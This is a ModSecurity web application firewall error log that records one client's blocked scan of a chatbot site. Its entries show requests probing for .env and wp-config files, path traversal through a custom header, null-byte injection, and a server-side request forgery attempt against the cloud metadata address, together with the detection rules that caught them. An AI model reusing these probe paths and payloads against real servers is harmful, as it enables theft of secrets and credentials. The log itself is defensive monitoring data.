[Tue May 12 06:16:07.658550 2026] [security2:error] [pid 1825179:tid 1825214] [client 45.148.10.166:64846] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKph9r1yOh9TvizezitgQAAAFA"]
[Tue May 12 06:16:07.658730 2026] [security2:error] [pid 1825179:tid 1825214] [client 45.148.10.166:64846] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKph9r1yOh9TvizezitgQAAAFA"]
[Tue May 12 06:16:07.658821 2026] [security2:error] [pid 1808852:tid 1808874] [client 45.148.10.166:64940] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.tchatbooster.com"] [uri "/_next/image"] [unique_id "agKphxfeipD4uoG21Fo_qAAAABM"]
[Tue May 12 06:16:07.659489 2026] [security2:error] [pid 1808852:tid 1808874] [client 45.148.10.166:64940] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/_next/image"] [unique_id "agKphxfeipD4uoG21Fo_qAAAABM"]
[Tue May 12 06:16:07.666053 2026] [core:error] [pid 1842385:tid 1842406] [client 45.148.10.166:64838] AH10244: invalid URI path (/static../../../.env)
[Tue May 12 06:16:07.670125 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:64922] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKphxs7kySIUZ3ORnI1HQAAARE"]
[Tue May 12 06:16:07.670186 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:64922] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKphxs7kySIUZ3ORnI1HQAAARE"]
[Tue May 12 06:16:07.670223 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:64922] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKphxs7kySIUZ3ORnI1HQAAARE"]
[Tue May 12 06:16:07.670391 2026] [security2:error] [pid 1844863:tid 1844882] [client 45.148.10.166:64874] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.example"] [unique_id "agKph_aAnTZtx1_H_wzF9wAAAU0"]
[Tue May 12 06:16:07.670424 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:64922] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKphxs7kySIUZ3ORnI1HQAAARE"]
[Tue May 12 06:16:07.670483 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:64922] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKphxs7kySIUZ3ORnI1HQAAARE"]
[Tue May 12 06:16:07.670534 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:64922] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKphxs7kySIUZ3ORnI1HQAAARE"]
[Tue May 12 06:16:07.670564 2026] [security2:error] [pid 1844863:tid 1844882] [client 45.148.10.166:64874] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.example"] [unique_id "agKph_aAnTZtx1_H_wzF9wAAAU0"]
[Tue May 12 06:16:07.670571 2026] [security2:error] [pid 1820198:tid 1820208] [client 45.148.10.166:64904] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/app/.env"] [unique_id "agKph81tk6y7yBJLpJpE3wAAAIg"]
[Tue May 12 06:16:07.670726 2026] [security2:error] [pid 1820198:tid 1820208] [client 45.148.10.166:64904] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/app/.env"] [unique_id "agKph81tk6y7yBJLpJpE3wAAAIg"]
[Tue May 12 06:16:07.670884 2026] [security2:error] [pid 1842385:tid 1842408] [client 45.148.10.166:64922] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKphxs7kySIUZ3ORnI1HQAAARE"]
[Tue May 12 06:16:07.675367 2026] [security2:error] [pid 1825179:tid 1825206] [client 45.148.10.166:64894] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php~"] [unique_id "agKph9r1yOh9TvizezitggAAAEg"]
[Tue May 12 06:16:07.675527 2026] [security2:error] [pid 1825179:tid 1825206] [client 45.148.10.166:64894] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php~"] [unique_id "agKph9r1yOh9TvizezitggAAAEg"]
[Tue May 12 06:16:07.678991 2026] [security2:error] [pid 1825287:tid 1825305] [client 45.148.10.166:64866] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.tchatbooster.com"] [uri "/storage/logs/laravel.log"] [unique_id "agKphwgpmE1yW0glLdg8NAAAAME"]
[Tue May 12 06:16:07.679210 2026] [security2:error] [pid 1825287:tid 1825305] [client 45.148.10.166:64866] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/storage/logs/laravel.log"] [unique_id "agKphwgpmE1yW0glLdg8NAAAAME"]
[Tue May 12 06:16:07.711204 2026] [security2:error] [pid 1844863:tid 1844884] [client 45.148.10.166:35946] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKphPaAnTZtx1_H_wzF6gAAAU8"]
[Tue May 12 06:16:07.772429 2026] [security2:error] [pid 1842385:tid 1842396] [client 45.148.10.166:35956] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKphBs7kySIUZ3ORnI1FgAAAQY"]
[Tue May 12 06:16:08.276331 2026] [security2:error] [pid 1825179:tid 1825207] [client 45.148.10.166:36074] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKphdr1yOh9TvizezitcwAAAEk"]
[Tue May 12 06:16:08.279204 2026] [security2:error] [pid 1844863:tid 1844880] [client 45.148.10.166:64966] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/backend/.env"] [unique_id "agKpiPaAnTZtx1_H_wzF-QAAAUs"]
[Tue May 12 06:16:08.279401 2026] [security2:error] [pid 1844863:tid 1844880] [client 45.148.10.166:64966] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/backend/.env"] [unique_id "agKpiPaAnTZtx1_H_wzF-QAAAUs"]
[Tue May 12 06:16:08.371447 2026] [security2:error] [pid 1825287:tid 1825324] [client 45.148.10.166:35972] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKphQgpmE1yW0glLdg8LgAAANM"]
[Tue May 12 06:16:08.856154 2026] [security2:error] [pid 1820198:tid 1820211] [client 45.148.10.166:35892] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKphc1tk6y7yBJLpJpE2QAAAIs"]
[Tue May 12 06:16:08.865833 2026] [core:error] [pid 1808852:tid 1808859] [client 45.148.10.166:65034] AH10244: invalid URI path (/static../../../../.env)
[Tue May 12 06:16:08.903731 2026] [security2:error] [pid 1820198:tid 1820223] [client 45.148.10.166:35988] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKpg81tk6y7yBJLpJpE0wAAAJc"]
[Tue May 12 06:16:09.016158 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:35908] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKphdr1yOh9TvizeziteAAAAFY"]
[Tue May 12 06:16:09.459107 2026] [security2:error] [pid 1825287:tid 1825309] [client 45.148.10.166:35928] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKphggpmE1yW0glLdg8MAAAAMQ"]
[Tue May 12 06:16:09.465648 2026] [security2:error] [pid 1825179:tid 1825216] [client 45.148.10.166:35970] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKphdr1yOh9TvizezitdQAAAFI"]
[Tue May 12 06:16:09.470001 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:65054] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKpiRfeipD4uoG21Fo_rAAAABI"]
[Tue May 12 06:16:09.470053 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:65054] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKpiRfeipD4uoG21Fo_rAAAABI"]
[Tue May 12 06:16:09.470085 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:65054] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKpiRfeipD4uoG21Fo_rAAAABI"]
[Tue May 12 06:16:09.470299 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:65054] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKpiRfeipD4uoG21Fo_rAAAABI"]
[Tue May 12 06:16:09.470357 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:65054] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKpiRfeipD4uoG21Fo_rAAAABI"]
[Tue May 12 06:16:09.470396 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:65054] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKpiRfeipD4uoG21Fo_rAAAABI"]
[Tue May 12 06:16:09.470797 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.166:65054] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKpiRfeipD4uoG21Fo_rAAAABI"]
